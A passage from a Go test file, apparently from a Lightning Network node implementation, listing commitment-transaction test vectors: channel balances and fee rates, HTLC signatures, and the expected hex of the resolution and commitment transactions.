\"020000000001018154ecccf11a5fb56c39654c4deb4d2296f83c69268280b94d021370c94e219702000000000000000001d0070000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e050047304402201b63ec807771baf4fdff523c644080de17f1da478989308ad13a58b51db91d360220568939d38c9ce295adba15665fa68f51d967e8ed14a007b751540a80b325f20201483045022100def389deab09cee69eaa1ec14d9428770e45bcbe9feb46468ecf481371165c2f022015d2e3c46600b2ebba8dcc899768874cc6851fd1ecb3fffd15db1cc3de7e10da012001010101010101010101010101010101010101010101010101010101010101018a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a9144b6b2e5444c2639cc0fb7bcea5afba3f3cdce23988527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f501b175ac686800000000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 3,\n\t\t\t\t\tremoteSigHex: \"3045022100daee1808f9861b6c3ecd14f7b707eca02dd6bdfc714ba2f33bc8cdba507bb182022026654bf8863af77d74f51f4e0b62d461a019561bb12acb120d3f7195d148a554\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018154ecccf11a5fb56c39654c4deb4d2296f83c69268280b94d021370c94e219703000000000000000001b80b0000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100daee1808f9861b6c3ecd14f7b707eca02dd6bdfc714ba2f33bc8cdba507bb182022026654bf8863af77d74f51f4e0b62d461a019561bb12acb120d3f7195d148a554014730440220643aacb19bbb72bd2b635bc3f7375481f5981bace78cdd8319b2988ffcc6704202203d27784ec8ad51ed3bd517a05525a5139bb0b755dd719e0054332d186ac0872701008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a9148a486ff2e31d6158bf39e2608864d63fefd09d5b88ac6868f7010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"304402207e0410e45454b0978a623f36a10626ef17b27d9ad44e2760f98cfa3efb37924f0220220bd8acd43ecaa916a80bd4f919c495a2c58982ce7c8625153f8596692a801d\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018154ecccf11a5fb56c39654c4deb4d2296f83c69268280b94d021370c94e219704000000000000000001a00f0000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e050047304402207e0410e45454b0978a623f36a10626ef17b27d9ad44e2760f98cfa3efb37924f0220220bd8acd43ecaa916a80bd4f919c495a2c58982ce7c8625153f8596692a801d014730440220549e80b4496803cbc4a1d09d46df50109f546d43fbbf86cd90b174b1484acd5402205f12a4f995cb9bded597eabfee195a285986aa6d93ae5bb72507ebc6a4e2349e012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8007e80300000000000022002052bfef0479d7b293c27e0f1eb294bea154c63a3294ef092c19af51409bce0e2ad007000000000000220020403d394747cae42e98ff01734ad5c08f82ba123d3d9a620abda88989651e2ab5d007000000000000220020748eba944fedc8827f6b06bc44678f93c0f9e6078b35c6331ed31e75f8ce0c2db80b000000000000220020c20b5d1f8584fd90443e7b7b720136174fa4b9333c261d04dbbd012635c0f419a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de843110e0a06a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e04004730440220275b0c325a5e9355650dc30c0eccfbc7efb23987c24b556b9dfdd40effca18d202206caceb2c067836c51f296740c7ae807ffcbfbf1dd3a0d56b6de9a5b247985f060147304402204fd4928835db1ccdfc40f5c78ce9bd65249b16348df81f0c44328dcdefc97d630220194d3869c38bc732dd87d13d2958015e2fc16829e74cd4377f84d215c0b7060601475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"304402204fd4928835db1ccdfc40f5c78ce9bd65249b16348df81f0c44328dcdefc97d630220194d3869c38bc732dd87d13d2958015e2fc16829e74cd4377f84d215c0b70606\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 647,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 0,\n\t\t\t\t\tremoteSigHex: \"30440220385a5afe75632f50128cbb029ee95c80156b5b4744beddc729ad339c9ca432c802202ba5f48550cad3379ac75b9b4fedb86a35baa6947f16ba5037fb8b11ab343740\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018323148ce2419f21ca3d6780053747715832e18ac780931a514b187768882bb60000000000000000000122020000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e05004730440220385a5afe75632f50128cbb029ee95c80156b5b4744beddc729ad339c9ca432c802202ba5f48550cad3379ac75b9b4fedb86a35baa6947f16ba5037fb8b11ab3437400147304402205999590b8a79fa346e003a68fd40366397119b2b0cdf37b149968d6bc6fbcc4702202b1e1fb5ab7864931caed4e732c359e0fe3d86a548b557be2246efb1708d579a012000000000000000000000000000000000000000000000000000000000000000008a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a914b8bcb07f6344b42ab04250c86a6e8b75d3fdbbc688527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f401b175ac686800000000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 2,\n\t\t\t\t\tremoteSigHex: \"304402207ceb6678d4db33d2401fdc409959e57c16a6cb97a30261d9c61f29b8c58d34b90220084b4a17b4ca0e86f2d798b3698ca52de5621f2ce86f80bed79afa66874511b0\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018323148ce2419f21ca3d6780053747715832e18ac780931a514b187768882bb60100000000000000000124060000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e050047304402207ceb6678d4db33d2401fdc409959e57c16a6cb97a30261d9c61f29b8c58d34b90220084b4a17b4ca0e86f2d798b3698ca52de5621f2ce86f80bed79afa66874511b00147304402207ff03eb0127fc7c6cae49cc29e2a586b98d1e8969cf4a17dfa50b9c2647720b902205e2ecfda2252956c0ca32f175080e75e4e390e433feb1f8ce9f2ba55648a1dac01008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a914b43e1b38138a41b37f7cd9a1d274bc63e3a9b5d188ac6868f6010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 1,\n\t\t\t\t\tremoteSigHex: \"304402206a401b29a0dff0d18ec903502c13d83e7ec019450113f4a7655a4ce40d1f65ba0220217723a084e727b6ca0cc8b6c69c014a7e4a01fcdcba3e3993f462a3c574d833\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018323148ce2419f21ca3d6780053747715832e18ac780931a514b187768882bb6020000000000000000010a060000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e050047304402206a401b29a0dff0d18ec903502c13d83e7ec019450113f4a7655a4ce40d1f65ba0220217723a084e727b6ca0cc8b6c69c014a7e4a01fcdcba3e3993f462a3c574d83301483045022100d50d067ca625d54e62df533a8f9291736678d0b86c28a61bb2a80cf42e702d6e02202373dde7e00218eacdafb9415fe0e1071beec1857d1af3c6a201a44cbc47c877012001010101010101010101010101010101010101010101010101010101010101018a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a9144b6b2e5444c2639cc0fb7bcea5afba3f3cdce23988527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f501b175ac686800000000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 3,\n\t\t\t\t\tremoteSigHex: \"30450221009b1c987ba599ee3bde1dbca776b85481d70a78b681a8d84206723e2795c7cac002207aac84ad910f8598c4d1c0ea2e3399cf6627a4e3e90131315bc9f038451ce39d\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018323148ce2419f21ca3d6780053747715832e18ac780931a514b187768882bb6030000000000000000010c0a0000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e05004830450221009b1c987ba599ee3bde1dbca776b85481d70a78b681a8d84206723e2795c7cac002207aac84ad910f8598c4d1c0ea2e3399cf6627a4e3e90131315bc9f038451ce39d01483045022100db9dc65291077a52728c622987e9895b7241d4394d6dcb916d7600a3e8728c22022036ee3ee717ba0bb5c45ee84bc7bbf85c0f90f26ae4e4a25a6b4241afa8a3f1cb01008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a9148a486ff2e31d6158bf39e2608864d63fefd09d5b88ac6868f7010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"3045022100cc28030b59f0914f45b84caa983b6f8effa900c952310708c2b5b00781117022022027ba2ccdf94d03c6d48b327f183f6e28c8a214d089b9227f94ac4f85315274f0\",\n\t\t\t\t\tresolutionTxHex: \"020000000001018323148ce2419f21ca3d6780053747715832e18ac780931a514b187768882bb604000000000000000001da0d0000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100cc28030b59f0914f45b84caa983b6f8effa900c952310708c2b5b00781117022022027ba2ccdf94d03c6d48b327f183f6e28c8a214d089b9227f94ac4f85315274f00147304402202d1a3c0d31200265d2a2def2753ead4959ae20b4083e19553acfffa5dfab60bf022020ede134149504e15b88ab261a066de49848411e15e70f9e6a5462aec2949f8f012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8007e80300000000000022002052bfef0479d7b293c27e0f1eb294bea154c63a3294ef092c19af51409bce0e2ad007000000000000220020403d394747cae42e98ff01734ad5c08f82ba123d3d9a620abda88989651e2ab5d007000000000000220020748eba944fedc8827f6b06bc44678f93c0f9e6078b35c6331ed31e75f8ce0c2db80b000000000000220020c20b5d1f8584fd90443e7b7b720136174fa4b9333c261d04dbbd012635c0f419a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de843110e09c6a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e040048304502210094bfd8f5572ac0157ec76a9551b6c5216a4538c07cd13a51af4a54cb26fa14320220768efce8ce6f4a5efac875142ff19237c011343670adf9c7ac69704a120d116301483045022100a5c01383d3ec646d97e40f44318d49def817fcd61a0ef18008a665b3e151785502203e648efddd5838981ef55ec954be69c4a652d021e6081a100d034de366815e9b01475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3045022100a5c01383d3ec646d97e40f44318d49def817fcd61a0ef18008a665b3e151785502203e648efddd5838981ef55ec954be69c4a652d021e6081a100d034de366815e9b\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 648,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 2,\n\t\t\t\t\tremoteSigHex: \"3044022062ef2e77591409d60d7817d9bb1e71d3c4a2931d1a6c7c8307422c84f001a251022022dad9726b0ae3fe92bda745a06f2c00f92342a186d84518588cf65f4dfaada8\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101579c183eca9e8236a5d7f5dcd79cfec32c497fdc0ec61533cde99ecd436cadd10000000000000000000123060000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500473044022062ef2e77591409d60d7817d9bb1e71d3c4a2931d1a6c7c8307422c84f001a251022022dad9726b0ae3fe92bda745a06f2c00f92342a186d84518588cf65f4dfaada801483045022100a4c574f00411dd2f978ca5cdc1b848c311cd7849c087ad2f21a5bce5e8cc5ae90220090ae39a9bce2fb8bc879d7e9f9022df249f41e25e51f1a9bf6447a9eeffc09801008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a914b43e1b38138a41b37f7cd9a1d274bc63e3a9b5d188ac6868f6010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 1,\n\t\t\t\t\tremoteSigHex: \"3045022100e968cbbb5f402ed389fdc7f6cd2a80ed650bb42c79aeb2a5678444af94f6c78502204b47a1cb24ab5b0b6fe69fe9cfc7dba07b9dd0d8b95f372c1d9435146a88f8d4\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101579c183eca9e8236a5d7f5dcd79cfec32c497fdc0ec61533cde99ecd436cadd10100000000000000000109060000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100e968cbbb5f402ed389fdc7f6cd2a80ed650bb42c79aeb2a5678444af94f6c78502204b47a1cb24ab5b0b6fe69fe9cfc7dba07b9dd0d8b95f372c1d9435146a88f8d40147304402207679cf19790bea76a733d2fa0672bd43ab455687a068f815a3d237581f57139a0220683a1a799e102071c206b207735ca80f627ab83d6616b4bcd017c5d79ef3e7d0012001010101010101010101010101010101010101010101010101010101010101018a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a9144b6b2e5444c2639cc0fb7bcea5afba3f3cdce23988527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f501b175ac686800000000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 3,\n\t\t\t\t\tremoteSigHex: \"3045022100aa91932e305292cf9969cc23502bbf6cef83a5df39c95ad04a707c4f4fed5c7702207099fc0f3a9bfe1e7683c0e9aa5e76c5432eb20693bf4cb182f04d383dc9c8c2\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101579c183eca9e8236a5d7f5dcd79cfec32c497fdc0ec61533cde99ecd436cadd1020000000000000000010b0a0000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100aa91932e305292cf9969cc23502bbf6cef83a5df39c95ad04a707c4f4fed5c7702207099fc0f3a9bfe1e7683c0e9aa5e76c5432eb20693bf4cb182f04d383dc9c8c20147304402200df76fea718745f3c529bac7fd37923e7309ce38b25c0781e4cf514dd9ef8dc802204172295739dbae9fe0474dcee3608e3433b4b2af3a2e6787108b02f894dcdda301008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a9148a486ff2e31d6158bf39e2608864d63fefd09d5b88ac6868f7010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"3044022035cac88040a5bba420b1c4257235d5015309113460bc33f2853cd81ca36e632402202fc94fd3e81e9d34a9d01782a0284f3044370d03d60f3fc041e2da088d2de58f\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101579c183eca9e8236a5d7f5dcd79cfec32c497fdc0ec61533cde99ecd436cadd103000000000000000001d90d0000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500473044022035cac88040a5bba420b1c4257235d5015309113460bc33f2853cd81ca36e632402202fc94fd3e81e9d34a9d01782a0284f3044370d03d60f3fc041e2da088d2de58f0147304402200daf2eb7afd355b4caf6fb08387b5f031940ea29d1a9f35071288a839c9039e4022067201b562456e7948616c13acb876b386b511599b58ac1d94d127f91c50463a6012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8006d007000000000000220020403d394747cae42e98ff01734ad5c08f82ba123d3d9a620abda88989651e2ab5d007000000000000220020748eba944fedc8827f6b06bc44678f93c0f9e6078b35c6331ed31e75f8ce0c2db80b000000000000220020c20b5d1f8584fd90443e7b7b720136174fa4b9333c261d04dbbd012635c0f419a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de8431104e9d6a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0400483045022100a2270d5950c89ae0841233f6efea9c951898b301b2e89e0adbd2c687b9f32efa02207943d90f95b9610458e7c65a576e149750ff3accaacad004cd85e70b235e27de01473044022072714e2fbb93cdd1c42eb0828b4f2eff143f717d8f26e79d6ada4f0dcb681bbe02200911be4e5161dd6ebe59ff1c58e1997c4aea804f81db6b698821db6093d7b05701475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3044022072714e2fbb93cdd1c42eb0828b4f2eff143f717d8f26e79d6ada4f0dcb681bbe02200911be4e5161dd6ebe59ff1c58e1997c4aea804f81db6b698821db6093d7b057\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 2069,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 2,\n\t\t\t\t\tremoteSigHex: \"3045022100d1cf354de41c1369336cf85b225ed033f1f8982a01be503668df756a7e668b66022001254144fb4d0eecc61908fccc3388891ba17c5d7a1a8c62bdd307e5a513f992\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101ca94a9ad516ebc0c4bdd7b6254871babfa978d5accafb554214137d398bfcf6a0000000000000000000175020000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100d1cf354de41c1369336cf85b225ed033f1f8982a01be503668df756a7e668b66022001254144fb4d0eecc61908fccc3388891ba17c5d7a1a8c62bdd307e5a513f99201473044022056eb1af429660e45a1b0b66568cb8c4a3aa7e4c9c292d5d6c47f86ebf2c8838f022065c3ac4ebe980ca7a41148569be4ad8751b0a724a41405697ec55035dae6640201008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a914b43e1b38138a41b37f7cd9a1d274bc63e3a9b5d188ac6868f6010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 1,\n\t\t\t\t\tremoteSigHex: \"3045022100d065569dcb94f090345402736385efeb8ea265131804beac06dd84d15dd2d6880220664feb0b4b2eb985fadb6ec7dc58c9334ea88ce599a9be760554a2d4b3b5d9f4\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101ca94a9ad516ebc0c4bdd7b6254871babfa978d5accafb554214137d398bfcf6a0100000000000000000122020000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100d065569dcb94f090345402736385efeb8ea265131804beac06dd84d15dd2d6880220664feb0b4b2eb985fadb6ec7dc58c9334ea88ce599a9be760554a2d4b3b5d9f401483045022100914bb232cd4b2690ee3d6cb8c3713c4ac9c4fb925323068d8b07f67c8541f8d9022057152f5f1615b793d2d45aac7518989ae4fe970f28b9b5c77504799d25433f7f012001010101010101010101010101010101010101010101010101010101010101018a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a9144b6b2e5444c2639cc0fb7bcea5afba3f3cdce23988527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f501b175ac686800000000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 3,\n\t\t\t\t\tremoteSigHex: \"3045022100d4e69d363de993684eae7b37853c40722a4c1b4a7b588ad7b5d8a9b5006137a102207a069c628170ee34be5612747051bdcc087466dbaa68d5756ea81c10155aef18\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101ca94a9ad516ebc0c4bdd7b6254871babfa978d5accafb554214137d398bfcf6a020000000000000000015d060000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100d4e69d363de993684eae7b37853c40722a4c1b4a7b588ad7b5d8a9b5006137a102207a069c628170ee34be5612747051bdcc087466dbaa68d5756ea81c10155aef180147304402200e362443f7af830b419771e8e1614fc391db3a4eb799989abfc5ab26d6fcd032022039ab0cad1c14dfbe9446bf847965e56fe016e0cbcf719fd18c1bfbf53ecbd9f901008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a9148a486ff2e31d6158bf39e2608864d63fefd09d5b88ac6868f7010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"30450221008ec888e36e4a4b3dc2ed6b823319855b2ae03006ca6ae0d9aa7e24bfc1d6f07102203b0f78885472a67ff4fe5916c0bb669487d659527509516fc3a08e87a2cc0a7c\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101ca94a9ad516ebc0c4bdd7b6254871babfa978d5accafb554214137d398bfcf6a03000000000000000001f2090000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e05004830450221008ec888e36e4a4b3dc2ed6b823319855b2ae03006ca6ae0d9aa7e24bfc1d6f07102203b0f78885472a67ff4fe5916c0bb669487d659527509516fc3a08e87a2cc0a7c0147304402202c3e14282b84b02705dfd00a6da396c9fe8a8bcb1d3fdb4b20a4feba09440e8b02202b058b39aa9b0c865b22095edcd9ff1f71bbfe20aa4993755e54d042755ed0d5012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8006d007000000000000220020403d394747cae42e98ff01734ad5c08f82ba123d3d9a620abda88989651e2ab5d007000000000000220020748eba944fedc8827f6b06bc44678f93c0f9e6078b35c6331ed31e75f8ce0c2db80b000000000000220020c20b5d1f8584fd90443e7b7b720136174fa4b9333c261d04dbbd012635c0f419a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de84311077956a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e040047304402203ca8f31c6a47519f83255dc69f1894d9a6d7476a19f498d31eaf0cd3a85eeb63022026fd92dc752b33905c4c838c528b692a8ad4ced959990b5d5ee2ff940fa90eea01473044022001d55e488b8b035b2dd29d50b65b530923a416d47f377284145bc8767b1b6a75022019bb53ddfe1cefaf156f924777eaaf8fdca1810695a7d0a247ad2afba8232eb401475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3044022001d55e488b8b035b2dd29d50b65b530923a416d47f377284145bc8767b1b6a75022019bb53ddfe1cefaf156f924777eaaf8fdca1810695a7d0a247ad2afba8232eb4\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 2070,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 2,\n\t\t\t\t\tremoteSigHex: \"3045022100eed143b1ee4bed5dc3cde40afa5db3e7354cbf9c44054b5f713f729356f08cf7022077161d171c2bbd9badf3c9934de65a4918de03bbac1450f715275f75b103f891\",\n\t\t\t\t\tresolutionTxHex: \"0200000000010140a83ce364747ff277f4d7595d8d15f708418798922c40bc2b056aca5485a2180000000000000000000174020000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100eed143b1ee4bed5dc3cde40afa5db3e7354cbf9c44054b5f713f729356f08cf7022077161d171c2bbd9badf3c9934de65a4918de03bbac1450f715275f75b103f89101483045022100a0d043ed533e7fb1911e0553d31a8e2f3e6de19dbc035257f29d747c5e02f1f5022030cd38d8e84282175d49c1ebe0470db3ebd59768cf40780a784e248a43904fb801008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a914b43e1b38138a41b37f7cd9a1d274bc63e3a9b5d188ac6868f6010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 3,\n\t\t\t\t\tremoteSigHex: \"3044022071e9357619fd8d29a411dc053b326a5224c5d11268070e88ecb981b174747c7a02202b763ae29a9d0732fa8836dd8597439460b50472183f420021b768981b4f7cf6\",\n\t\t\t\t\tresolutionTxHex: \"0200000000010140a83ce364747ff277f4d7595d8d15f708418798922c40bc2b056aca5485a218010000000000000000015c060000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500473044022071e9357619fd8d29a411dc053b326a5224c5d11268070e88ecb981b174747c7a02202b763ae29a9d0732fa8836dd8597439460b50472183f420021b768981b4f7cf601483045022100adb1d679f65f96178b59f23ed37d3b70443118f345224a07ecb043eee2acc157022034d24524fe857144a3bcfff3065a9994d0a6ec5f11c681e49431d573e242612d01008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a9148a486ff2e31d6158bf39e2608864d63fefd09d5b88ac6868f7010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: 